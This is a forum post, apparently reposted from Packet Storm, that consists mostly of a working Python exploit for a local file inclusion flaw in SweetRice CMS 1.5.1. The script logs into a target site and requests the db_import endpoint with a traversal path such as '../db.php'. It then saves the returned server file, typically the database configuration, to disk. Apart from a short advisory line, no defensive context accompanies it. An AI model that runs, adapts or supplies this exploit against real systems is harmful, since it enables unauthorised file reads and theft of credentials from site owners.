SweetRice 1.5.1 Local File Inclusion

#213
Topic created · 1 Posts · 0 Views
  • SweetRice version 1.5.1 suffers from a local file inclusion vulnerability.
    MD5 | fd1b8a05213a6ee380797b66fa596fb7
    Download

    ||#/usr/bin/python  
    #-*- Coding: utf-8 -*-  
    # Exploit Title: SweetRice 1.5.1 - Local File Inclusion  
    # Exploit Author: Ashiyane Digital Security Team  
    # Date: 03-11-2016  
    # Vendor: http://www.basic-cms.org/  
    # Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip  
    # Version: 1.5.1  
    # Platform: WebApp - PHP - Mysql  
    import requests  
    import os  
    from requests import session  
    if os.name == 'nt':  
    os.system('cls')  
    else:  
    os.system('clear')  
    pass  
    banner = '''  
    +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+  
    |  _________                      __ __________.__                    |  
    | /   _____/_  _  __ ____   _____/  |\______   \__| ____  ____      |  
    | \_____  \\ \/ \/ // __ \_/ __ \   __\       _/  |/ ___\/ __ \     |  
    | /        \\     /\  ___/\  ___/|  | |    |   \  \  \__\  ___/     |  
    |/_______  / \/\_/  \___  >\___  >__| |____|_  /__|\___  >___  >    |  
    |        \/             \/     \/            \/        \/    \/     |  
    |    > SweetRice 1.5.1 Local File Inclusion                            |  
    |    > Script Cod3r : Ehsan Hosseini                                    |  
    +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+  
    '''  
    print(banner)  
    # Get Host & User & Pass & LfiPath  
    host = input("Enter The Target URL(Example : localhost.com) : ")  
    username = input("Enter Username : ")  
    password = input("Enter Password : ")  
    lfipath = input("Enter File To Download(Example : ../db.php) : ")  
    xplfile = input("Enter Name of File To Save(Example : ../db.php) : ")  
    userinfo = {  
    'user':username,  
    'passwd':password,  
    'rememberMe':''  
    }  
    with session() as r:  
    login = r.post('http://' + host + '/as/?type=signin', data=userinfo)  
    success = 'Login success'  
    if login.status_code == 200:  
    print("[+] Sending User&Pass...")  
    if login.text.find(success) > 1:  
    print("[+] Login Succssfully...")  
    else:  
    print("[-] User or Pass is incorrent...")  
    print("Good Bye...")  
    exit()  
    pass  
    pass  
    dlfile = r.get('http://' + host +   
    '/as/?type=data&mode=db_import&db_file=' + lfipath + '&form_mode=save')  
    if dlfile.status_code == 200:  
    print('[+] Exploit...')  
    file = open(xplfile, "w")  
    file.write(dlfile.text)  
    file.close()  
    print('[+] File Saved...')  
    print('[+] Exploit By Ehsan Hosseini')  
    else:  
    print("[-] Error in Exploting...")  
    pass ||  
    

    Source: packetstormsecurity.com

Log in to reply